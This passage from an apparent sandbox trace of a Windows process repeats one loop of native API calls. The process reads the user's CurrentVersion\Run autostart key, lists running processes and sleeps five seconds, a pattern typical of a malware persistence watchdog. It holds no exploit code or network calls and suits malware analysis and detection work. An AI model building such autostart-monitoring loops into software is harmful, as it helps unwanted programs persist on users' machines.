Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.703] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.703] NtClose (Handle=0x154) returned 0x0 [0185.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.707] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.719] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.719] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.719] NtClose (Handle=0x154) returned 0x0 [0185.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.723] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.734] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.734] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.734] NtClose (Handle=0x154) returned 0x0 [0185.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.740] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.749] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.750] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.750] NtClose (Handle=0x154) returned 0x0 [0185.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.753] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.765] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.765] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.765] NtClose (Handle=0x154) returned 0x0 [0185.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.770] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.781] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.781] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.781] NtClose (Handle=0x154) returned 0x0 [0185.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.786] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.796] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.796] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.796] NtClose (Handle=0x154) returned 0x0 [0185.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.800] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.812] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.812] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.812] NtClose (Handle=0x154) returned 0x0 [0185.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.828] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.828] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.828] NtClose (Handle=0x154) returned 0x0 [0185.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.832] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.843] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.843] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.843] NtClose (Handle=0x154) returned 0x0 [0185.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.849] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.859] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.859] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.859] NtClose (Handle=0x154) returned 0x0 [0185.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.863] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.874] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.874] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.874] NtClose (Handle=0x154) returned 0x0 [0185.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.890] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.890] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.890] NtClose (Handle=0x154) returned 0x0 [0185.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.894] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.908] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.908] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.908] NtClose (Handle=0x154) returned 0x0 [0185.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.909] 